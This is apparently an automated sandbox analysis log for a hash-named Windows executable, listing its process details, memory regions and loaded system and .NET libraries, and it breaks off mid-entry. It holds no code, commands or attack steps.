# Flog Txt Version 1
# Analyzer Version: 4.3.0
# Analyzer Build Date: Sep 20 2021 05:59:55
# Log Creation Date: 28.09.2021 11:40:59.571
Process:
id = "1"
image_name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
page_root = "0x45718000"
os_pid = "0xaf0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x664"
cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe\" "
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 118
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 119
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 120
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 121
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 122
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 123
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 124
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 125
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 126
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 127
start_va = 0x400000
end_va = 0x587fff
monitored = 1
entry_point = 0x583f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 128
start_va = 0x77260000
end_va = 0x773dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 129
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 130
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 131
start_va = 0x7fff0000
end_va = 0x7ffc5f80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 132
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 133
start_va = 0x7ffc5f9d1000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffc5f9d1000"
filename = ""
Region:
id = 271
start_va = 0x660000
end_va = 0x66ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 272
start_va = 0x62ee0000
end_va = 0x62f2ffff
monitored = 0
entry_point = 0x62ef8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 273
start_va = 0x62f30000
end_va = 0x62fa9fff
monitored = 0
entry_point = 0x62f43290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 274
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 275
start_va = 0x62fb0000
end_va = 0x62fb7fff
monitored = 0
entry_point = 0x62fb17c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 276
start_va = 0x670000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 277
start_va = 0x6cd30000
end_va = 0x6cd88fff
monitored = 1
entry_point = 0x6cd40780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 278
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 279
start_va = 0x76c20000
end_va = 0x76d9dfff
monitored = 0
entry_point = 0x76cd1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 280
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 281
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 282
start_va = 0x590000
end_va = 0x64dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 283
start_va = 0x7c0000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 284
start_va = 0x73ee0000
end_va = 0x73f71fff
monitored = 0
entry_point = 0x73f20380
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 285
start_va = 0x7fb00000
end_va = 0x7fea0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sysmain.sdb"
filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")
Region:
id = 286
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 287
start_va = 0x76a90000
end_va = 0x76b0afff
monitored = 0
entry_point = 0x76aae970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 288
start_va = 0x74290000
end_va = 0x7434dfff
monitored = 0
entry_point = 0x742c5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 289
start_va = 0x670000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 290
start_va = 0x6c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 291
start_va = 0x8b0000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 292
start_va = 0x74a40000
end_va = 0x74a83fff
monitored = 0
entry_point = 0x74a59d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 293
start_va = 0x75f60000
end_va = 0x7600cfff
monitored = 0
entry_point = 0x75f74f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 294
start_va = 0x73f90000
end_va = 0x73fadfff
monitored = 0
entry_point = 0x73f9b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 295
start_va = 0x73f80000
end_va = 0x73f89fff
monitored = 0
entry_point = 0x73f82a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 296
start_va = 0x75ef0000
end_va = 0x75f47fff
monitored = 0
entry_point = 0x75f325c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 297
start_va = 0x9b0000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 298
start_va = 0x6c4f0000
end_va = 0x6c568fff
monitored = 1
entry_point = 0x6c4ff82a
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 299
start_va = 0x76f60000
end_va = 0x76fa4fff
monitored = 0
entry_point = 0x76f7de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 300
start_va = 0x76da0000
end_va = 0x76f5cfff
monitored = 0
entry_point = 0x76e82a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 301
start_va = 0x76010000
end_va = 0x7615efff
monitored = 0
entry_point = 0x760c6820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 302
start_va = 0x76300000
end_va = 0x76446fff
monitored = 0
entry_point = 0x76311cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 303
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 304
start_va = 0xad0000
end_va = 0xc57fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ad0000"
filename = ""
Region:
id = 305
start_va = 0x77150000
end_va = 0x7717afff
monitored = 0
entry_point = 0x77155680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 306
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 307
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 308
start_va = 0xc60000
end_va = 0xde0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c60000"
filename = ""
Region:
id = 309
start_va = 0xdf0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000df0000"
filename = ""
Region:
id = 310
start_va = 0x21f0000
end_va = 0x2372fff
monitored = 1
entry_point = 0x2373f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 311
start_va = 0x74350000
end_va = 0x7435bfff
monitored = 0
entry_point = 0x74353930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 312
start_va = 0x6cd20000
end_va = 0x6cd27fff
monitored = 0
entry_point = 0x6cd217b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 313
start_va = 0x21f0000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 314
start_va = 0x6bf40000
end_va = 0x6c4effff
monitored = 1
entry_point = 0x6bf8a848
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 315
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 316
start_va = 0x6bea0000
end_va = 0x6bf3afff
monitored = 0
entry_point = 0x6bea232b
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll")
Region:
id = 317
start_va = 0x21f0000
end_va = 0x230ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 318
start_va = 0x23d0000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 319
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 320
start_va = 0x650000
end_va = 0x650fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 321
start_va = 0x6b0000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 322
start_va = 0x7c0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 323
start_va = 0x8a0000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 324
start_va = 0x7d0000
end_va = 0x7dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 325
start_va = 0x7e0000
end_va = 0x7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 326
start_va = 0x7f0000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 327
start_va = 0x800000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 328
start_va = 0x810000
end_va = 0x84ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 329
start_va = 0x9b0000
end_va = 0xaaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 330
start_va = 0xac0000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ac0000"
filename = ""
Region:
id = 331
start_va = 0x74a90000
end_va = 0x75e8efff
monitored = 0
entry_point = 0x74c4b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 332
start_va = 0x76fb0000
end_va = 0x76fe6fff
monitored = 0
entry_point = 0x76fb3b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 333
start_va = 0x764b0000
end_va = 0x769a8fff
monitored = 0
entry_point = 0x766b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 334
start_va = 0x77180000
end_va = 0x7720cfff
monitored = 0
entry_point = 0x771c9b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 335
start_va = 0x77210000
end_va = 0x77253fff
monitored = 0
entry_point = 0x77217410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 336
start_va = 0x75f50000
end_va = 0x75f5efff
monitored = 0
entry_point = 0x75f52e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 337
start_va = 0x850000
end_va = 0x850fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000850000"
filename = ""
Region:
id = 338
start_va = 0x23e0000
end_va = 0x2716fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 339
start_va = 0x860000
end_va = 0x86ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 340
start_va = 0x2720000
end_va = 0x471ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 341
start_va = 0x21f0000
end_va = 0x228ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 342
start_va = 0x2300000
end_va = 0x230ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 343
start_va = 0x860000
end_va = 0x89ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 344
start_va = 0x4720000
end_va = 0x481ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004720000"
filename = ""
Region:
id = 345
start_va = 0x6b3a0000
end_va = 0x6be99fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll")
Region:
id = 346
start_va = 0x76b10000
end_va = 0x76bfafff
monitored = 0
entry_point = 0x76b4d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 347
start_va = 0x2310000
end_va = 0x23a0fff
monitored = 0
entry_point = 0x2348cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 348
start_va = 0x70040000
end_va = 0x700b4fff
monitored = 0
entry_point = 0x70079a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 349
start_va = 0x2310000
end_va = 0x23cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 350
start_va = 0xab0000
end_va = 0xabffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ab0000"
filename = ""
Region:
id = 351
start_va = 0x2290000
end_va = 0x2292fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls")
Region:
id = 352
start_va = 0x4820000
end_va = 0x49a2fff
monitored = 1
entry_point = 0x49a3f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 353
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 354
start_va = 0x22a0000
end_va = 0x22dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 355
start_va = 0x4820000
end_va = 0x4cedfff
monitored = 0
entry_point = 0x4c9c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 356
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 357
start_va = 0x6abf0000
end_va = 0x6b392fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\2dcc35955cda7c1279cec70d8a3ac1c1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\2dcc35955cda7c1279cec70d8a3ac1c1\\system.ni.dll")
Region:
id = 358
start_va = 0x22e0000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022e0000"
filename = ""
Region:
id = 359
start_va = 0x22f0000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 360
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 361
start_va = 0x2310000
end_va = 0x23abfff
monitored = 0
entry_point = 0x239921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 362
start_va = 0x23c0000
end_va = 0x23cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023c0000"
filename = ""
Region:
id = 363
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 364
start_va = 0x6ab90000
end_va = 0x6abeafff
monitored = 1
entry_point = 0x6abd9010
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll")
Region:
id = 365
start_va = 0x23b0000
end_va = 0x23b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000023b0000"
filename = ""
Region:
id = 366
start_va = 0x4cf0000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cf0000"
filename = ""
Region:
id = 367
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 368
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 369
start_va = 0x4d10000
end_va = 0x4db5fff
monitored = 0
entry_point = 0x4d9e14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 370
start_va = 0x4dc0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dc0000"
filename = ""
Region:
id = 371
start_va = 0x4dd0000
end_va = 0x4ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 372
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 373
start_va = 0x4de0000
end_va = 0x4deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004de0000"
filename = ""
Region:
id = 374
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 375
start_va = 0x4df0000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 376
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
